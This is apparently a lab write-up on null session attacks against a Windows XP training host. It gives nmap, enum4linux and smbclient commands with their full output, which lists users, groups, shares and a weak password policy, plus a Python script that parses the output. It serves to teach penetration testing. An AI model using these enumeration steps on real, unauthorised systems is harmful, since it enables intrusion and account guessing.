Eliminate Your Fears And Doubts About Null Session Attack

 

https://www.kumaratuljaiswal.in

 

 

The final goal of this post is to show you how to retrieve information from a target machine, such as shares, users, groups and so on, over a null session. Moreover, by navigating the remote machine you should be able to find a file named "Congratulations.txt". Download it and explore its content.



A Windows machine can share a file or a directory on the network; this lets local and remote users access the resource and, possibly, modify it.


Example


A file server in an office lets users open and edit the documents of their own department, while it lets everyone read, but not modify, public information files.

This feature is very useful in a network environment: the ability to share resources and files reduces redundancy and can improve work efficiency in a company. Shares can be extremely useful when used properly and extremely dangerous when configured improperly. Creating network shares in a Windows-based environment is fairly easy: generally users just need to turn on the File and Printer Sharing service, and then they can start sharing directories or files.

Users can also set permissions on a share, stating who can perform operations such as reading, writing and changing permissions. Modern Windows versions let users either share a single file or directory, choosing the local or remote users to share it with, or use the Public directory; when sharing through the Public directory they can choose which local users can access its files, but for the network they can only allow everyone or no one. Keep in mind that the effective access to a shared file is the combination of the share permission and the NTFS permission on the file itself: the more restrictive of the two wins.




An authorised user can access a share by using its Universal Naming Convention path (UNC path).


The format of a UNC path is:

\\ServerName\ShareName\file.nat



Administrative shares


There are also some special default administrative shares, which are used by system administrators and by Windows itself:

\\ComputerName\C$ lets an administrator access a volume on the remote machine. Every volume has such a share (C$, D$, E$, etc.).

\\ComputerName\ADMIN$ points to the Windows installation directory (usually C:\Windows).

\\ComputerName\IPC$ is used for inter-process communication: it carries the named pipes over which RPC services such as SAMR, LSARPC and SRVSVC are reached. You cannot browse it via Windows Explorer.

The trailing $ only hides a share from browse listings such as net view; as the output later in this post shows, tools that query the server directly still see C$ and ADMIN$, so the only real protection on them is authentication, and both require administrative credentials. On Windows Vista and later, a host that is not joined to a domain also applies UAC token filtering to remote logons by local administrator accounts other than the built-in Administrator (unless LocalAccountTokenFilterPolicy is set), so those accounts are refused access to C$ and ADMIN$ even with the correct password.



You can test the volume share and the ADMIN$ share on your own computer, as an administrative user, by entering the following in the Windows Explorer address bar:


\\localhost\<sharename>

\\localhost\d$

 

 


Null session attacks can be used to enumerate a lot of information. Over a null session an attacker can retrieve:


# Shares
# System users
# System groups
# Password policies


Null sessions are remotely exploitable: an attacker can use their own computer to attack a vulnerable Windows machine over the network. Moreover, the same anonymous connection gives access to the named pipes behind the SAMR, LSARPC and SRVSVC RPC interfaces, which is what lets tools query users, groups, password policies and shares. Because of these factors, null session attacks had a huge impact on the Windows ecosystem.

Modern Windows versions are configured by default to be immune from this kind of attack: anonymous enumeration of SAM accounts and shares is refused (the RestrictAnonymous and RestrictAnonymousSAM values under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, exposed in security policy as "Network access: Do not allow anonymous enumeration of SAM accounts" and "... SAM accounts and shares"). However, legacy hosts, and hosts where an administrator has loosened these settings, can still be vulnerable.

A null session abuses the IPC$ administrative share: it lets an attacker connect to it on a local or remote machine without authentication, using an empty username and an empty password.

We will go through the enumeration of windows shares and their exploitation by using various techniques and tools.




Tools


The best tools for this lab are:

# enum4linux
# samrdump
# smbclient



Steps


# Find a target in the network
# Check for null session
# Exploit null session

It's time to get our hands dirty.



# Gather information with enum4linux

Use enum4linux and gather the following information:

# Shares
# Users
# Password policies
# Groups



Use smbclient to navigate the target machine

Mount the share or use the smbclient interactive command line to navigate the remote machine, then find and inspect the content of the Congratulations.txt file.



Find a target in the network


We first need to find out which network the target is on. We can do it by running ifconfig and checking the IP address of our tap0 interface, the one attached to the lab VPN.


┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether b4:b6:86:47:55:83 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2201 bytes 96326 (94.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2201 bytes 96326 (94.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.99.101 netmask 255.255.255.0 broadcast 0.0.0.0
inet6 fe80::5044:42ff:fe4d:3eb6 prefixlen 64 scopeid 0x20<link>
ether 52:44:42:4d:3e:b6 txqueuelen 1000 (Ethernet)
RX packets 3 bytes 363 (363.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 522 bytes 22356 (21.8 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.98.25 netmask 255.255.255.0 broadcast 192.168.98.255
inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9 prefixlen 64 scopeid 0x0<global>
inet6 fe80::aa80:f129:e78d:aa96 prefixlen 64 scopeid 0x20<link>
ether fc:01:7c:29:00:77 txqueuelen 1000 (Ethernet)
RX packets 92211 bytes 102634365 (97.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55571 bytes 9521350 (9.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$



As we can see, the target network is 192.168.99.0/24 (note that your IP address may differ from the one shown). Let's run nmap to discover the live hosts on the network (-sn does host discovery only, without a port scan):


┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -sn 192.168.99.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
Nmap scan report for 192.168.99.162
Host is up (0.53s latency).
MAC Address: 00:50:56:A5:DF:D7 (VMware)
Nmap scan report for 192.168.99.101
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$




The previous output shows that the only other host alive on the network is 192.168.99.162 (besides our own host, 192.168.99.101).


Check for null session


Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following output we are using enum4linux with the -n switch (an nmblookup of the NetBIOS name table, similar to nbtstat; the session check is always performed), but you can use any tool you prefer.


┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -n 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021

==========================
| Target Information |
==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


======================================================
| Enumerating Workgroup/Domain on 192.168.99.162 |
======================================================
[+] Got domain/workgroup name: WORKGROUP

==============================================
| Nbtstat Information for 192.168.99.162 |
==============================================
Looking up status of 192.168.99.162
ELS-WINXP <00> - B <ACTIVE> Workstation Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
ELS-WINXP <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser

MAC Address = 00-50-56-A5-DF-D7

=======================================
| Session Check on 192.168.99.162 |
=======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''

=============================================
| Getting domain SID for 192.168.99.162 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Sun Dec 26 21:03:38 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$



The nbtstat section shows the File Server Service entry (the <20> suffix), which tells us the host is offering SMB file sharing. More importantly, the Session Check section reports that the server allows sessions using username '' and password '': that is the null session, and it is what the rest of this lab relies on.



Exploit null session

It is time to get our hands dirty!



Gather information with enum4linux

Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:


┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ enum4linux -a 192.168.99.162
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021

==========================
| Target Information |
==========================
Target ........... 192.168.99.162
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


======================================================
| Enumerating Workgroup/Domain on 192.168.99.162 |
======================================================
[+] Got domain/workgroup name: WORKGROUP

==============================================
| Nbtstat Information for 192.168.99.162 |
==============================================
Looking up status of 192.168.99.162
ELS-WINXP <00> - B <ACTIVE> Workstation Service
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
ELS-WINXP <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser

MAC Address = 00-50-56-A5-DF-D7

=======================================
| Session Check on 192.168.99.162 |
=======================================
[+] Server 192.168.99.162 allows sessions using username '', password ''

=============================================
| Getting domain SID for 192.168.99.162 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

========================================
| OS information on 192.168.99.162 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.99.162 from smbclient:
[+] Got OS info for 192.168.99.162 from srvinfo:
192.168.99.162 Wk Sv NT PtB LMB
platform_id : 500
os version : 5.1
server type : 0x51003

===============================
| Users on 192.168.99.162 |
===============================
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS Name: (null) Desc: (null)
index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank Name: Frank Desc: (null)
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant Name: Remote Desktop Help Assistant Account Desc: Account for Providing Remote Assistance
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin Desc: (null)
index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US Desc: This is a vendor's account for the Help and Support Service

user:[Administrator] rid:[0x1f4]
user:[eLS] rid:[0x3eb]
user:[Frank] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[HelpAssistant] rid:[0x3e8]
user:[netadmin] rid:[0x3ec]
user:[SUPPORT_388945a0] rid:[0x3ea]

===========================================
| Share Enumeration on 192.168.99.162 |
===========================================

Sharename Type Comment
--------- ---- -------
My Documents Disk
IPC$ IPC Remote IPC
Frank Disk
C Disk
WorkSharing Disk
FrankDocs Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------

[+] Attempting to map shares on 192.168.99.162
//192.168.99.162/IPC$ Mapping: OK Listing: DENIED
//192.168.99.162/Frank Mapping: OK Listing: DENIED
//192.168.99.162/C [E] Can't understand response:
AUTOEXEC.BAT A 0 Fri Feb 13 06:20:47 2015
boot.ini HS 211 Fri Feb 13 06:16:17 2015
CONFIG.SYS A 0 Fri Feb 13 06:20:47 2015
Documents and Settings D 0 Wed Feb 18 14:55:58 2015
IO.SYS AHSR 0 Fri Feb 13 06:20:47 2015
MSDOS.SYS AHSR 0 Fri Feb 13 06:20:47 2015
NTDETECT.COM AHSR 47564 Tue Aug 3 22:38:34 2004
ntldr AHSR 250032 Tue Aug 3 22:59:34 2004
pagefile.sys AHS 805306368 Thu Dec 23 22:59:58 2021
Program Files DR 0 Mon Oct 3 21:40:27 2016
System Volume Information DHS 0 Fri Feb 13 06:24:12 2015
WINDOWS D 0 Mon Oct 3 21:42:49 2016

785224 blocks of size 4096. 345608 blocks available
//192.168.99.162/WorkSharing Mapping: OK, Listing: OK
//192.168.99.162/FrankDocs Mapping: OK Listing: DENIED
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.99.162/C$ Mapping: DENIED, Listing: N/A

======================================================
| Password Policy Information for 192.168.99.162 |
======================================================


[+] Attaching to 192.168.99.162 using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:192.168.99.162)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] ELS-WINXP
[+] Builtin

[+] Password Info for Domain: ELS-WINXP

[+] Minimum password length: None
[+] Password history length: None
[+] Maximum password age: 42 days 22 hours 47 minutes
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


================================
| Groups on 192.168.99.162 |
================================

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin

[+] Getting local groups:
group:[HelpServicesGroup] rid:[0x3e9]

[+] Getting local group memberships:
Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
Group 'None' (RID: 513) has member: ELS-WINXP\Guest
Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
Group 'None' (RID: 513) has member: ELS-WINXP\eLS
Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
Group 'None' (RID: 513) has member: ELS-WINXP\Frank

=========================================================================
| Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''

===============================================
| Getting printer info for 192.168.99.162 |
===============================================
Cannot connect to server. Error was NT_STATUS_NETWORK_UNREACHABLE


enum4linux complete on Sun Dec 26 22:35:32 2021

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$




As we can see in the previous output, a single anonymous connection gave us a lot of information about the machine: the OS version (5.1, i.e. Windows XP), seven local accounts including two custom ones (eLS and netadmin) that are members of the local Administrators group, the full share list, and a password policy with no minimum length, no complexity requirement and no lockout threshold, which means online password guessing against those accounts would never lock anything. Also note the share mapping section: WorkSharing is listable anonymously, and so is the C share. The "[E] Can't understand response" line is enum4linux failing to parse the directory listing that smbclient returned, not a denial, as the file list printed right after it shows.
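How a tester turns this kind of output into findings can be shown in code. The following Python script is an added example, not part of the original post and not part of enum4linux: it parses a constructed excerpt of the output above (the user, group membership, share mapping, password policy and SID lines), decodes the acb column of each user line using the MS-SAMR account-control bits, and lists the points worth reporting. The regular expressions, the dictionary layout and the wording of the findings are my own choices.

```python
import re

# MS-SAMR USER_ACCOUNT control bits behind the 'acb' column of the user list.
ACB_FLAGS = {
    0x0001: "disabled",
    0x0004: "password-not-required",
    0x0010: "normal-account",
    0x0200: "password-never-expires",
    0x0400: "auto-locked",
}

USER_RE = re.compile(r"RID:\s*0x([0-9a-fA-F]+)\s+acb:\s*0x([0-9a-fA-F]+)\s+Account:\s*(\S+)")
SHARE_RE = re.compile(r"^//[^/\s]+/(.+?)\s+Mapping:\s*(\w+),?\s+Listing:\s*(\S+)")
MEMBER_RE = re.compile(r"^Group '([^']+)' \(RID: \d+\) has member: (\S+)")
SID_RE = re.compile(r"Found new SID: (S-1-5-21(?:-\d+){3})\b")
POLICY_RE = re.compile(r"^\[\+\] (Minimum password length|Account Lockout Threshold): (.+)$")

# Constructed sample: a few lines copied from the enum4linux run shown in this post.
SAMPLE = """\
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account
index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in guest account
index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant Name: Remote Desktop Help Assistant Account
index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin Desc: (null)
//192.168.99.162/IPC$ Mapping: OK Listing: DENIED
//192.168.99.162/WorkSharing Mapping: OK, Listing: OK
//192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
[+] Minimum password length: None
[+] Account Lockout Threshold: None
Group 'Administrators' (RID: 544) has member: ELS-WINXP\\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\\Frank
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
"""


def decode_acb(acb):
    """Names of the account-control bits set in an acb value, in table order."""
    return [name for bit, name in ACB_FLAGS.items() if acb & bit]


def parse_enum4linux(text):
    """Parse enum4linux output into users, group members, shares, policy and SID."""
    parsed = {"users": {}, "members": {}, "shares": {}, "policy": {}, "sid": None}
    for line in (raw.strip() for raw in text.splitlines()):
        if m := USER_RE.search(line):
            rid, acb, name = int(m[1], 16), int(m[2], 16), m[3]
            parsed["users"][name] = {"rid": rid, "flags": decode_acb(acb)}
        elif m := SHARE_RE.match(line):
            parsed["shares"][m[1]] = (m[2], m[3])          # (mapping, listing)
        elif m := MEMBER_RE.match(line):
            parsed["members"].setdefault(m[1], []).append(m[2])
        elif m := SID_RE.search(line):
            parsed["sid"] = m[1]                           # machine/domain SID
        elif m := POLICY_RE.match(line):
            parsed["policy"][m[1]] = m[2]
    return parsed


def findings(parsed):
    """The points a tester would report, derived from the parsed output."""
    out = []
    for name, user in parsed["users"].items():
        if user["rid"] == 500 and name != "Administrator":
            out.append(f"built-in Administrator (RID 500) renamed to {name}")
        if "password-not-required" in user["flags"] and "disabled" not in user["flags"]:
            out.append(f"enabled account with no password required: {name}")
    for member in parsed["members"].get("Administrators", []):
        out.append(f"local administrator: {member}")
    for share, (mapping, listing) in parsed["shares"].items():
        if mapping == "OK" and listing == "OK":
            out.append(f"share listable anonymously: {share}")
    if parsed["policy"].get("Account Lockout Threshold") == "None":
        out.append("no account lockout: online password guessing is feasible")
    if parsed["policy"].get("Minimum password length") == "None":
        out.append("no minimum password length")
    if parsed["sid"]:
        # Every account SID is this SID plus a RID, which is what RID cycling walks.
        out.append(f"RID cycling base: {parsed['sid']}-<RID>")
    return out


if __name__ == "__main__":
    for line in findings(parse_enum4linux(SAMPLE)):
        print(line)
```

The acb values in the listing decode as follows: 0x210 is a normal account whose password never expires (Administrator, eLS, Frank, netadmin), 0x211 adds the disabled bit (HelpAssistant, SUPPORT_388945a0) and 0x214 adds "password not required" (Guest). The SID reported in the RID cycling section is the machine SID; appending a RID to it gives an account SID, which is why enum4linux tries the ranges 500-550 (built-in accounts) and 1000-1050 (accounts created later) when it cannot simply ask for the user list.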




Use smbclient to navigate the target machine


A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.

First let us get the list of shares using smbclient. -L asks for the share list and -I gives the IP address to connect to; -N suppresses the password prompt and -U "" sets an empty username, which together is exactly a null session:


┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient -L WORKGROUP -I 192.168.99.162 -N -U ""

Sharename Type Comment
--------- ---- -------
My Documents Disk
IPC$ IPC Remote IPC
Frank Disk
C Disk
WorkSharing Disk
FrankDocs Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$

Let us now try to access the WorkSharing share and see what files are stored in there. The backslashes in the UNC path are doubled because the shell would otherwise treat them as escape characters; smbclient also accepts the forward-slash form //192.168.99.162/WorkSharing:


┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Feb 18 16:37:31 2015
.. D 0 Wed Feb 18 16:37:31 2015
Congratulations.txt A 66 Wed Feb 18 15:11:59 2015

785224 blocks of size 4096. 345613 blocks available
smb: \>
smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>








As we can see in the previous output there is a file named Congratulations.txt. Let us download it to our machine with get (the Windows file system is case-insensitive, so the lowercase name in the get command still matches) and then use the cat command to display its content.




┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ cat congratulations.txt
Congratulations! You have successfully exploited a null session!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$





Disclaimer

 

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources; they do not involve any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly advise against it. Please read the word hacking as ethical hacking or penetration testing every time it is used. We do not promote, encourage, support or incite any illegal activity or hacking.

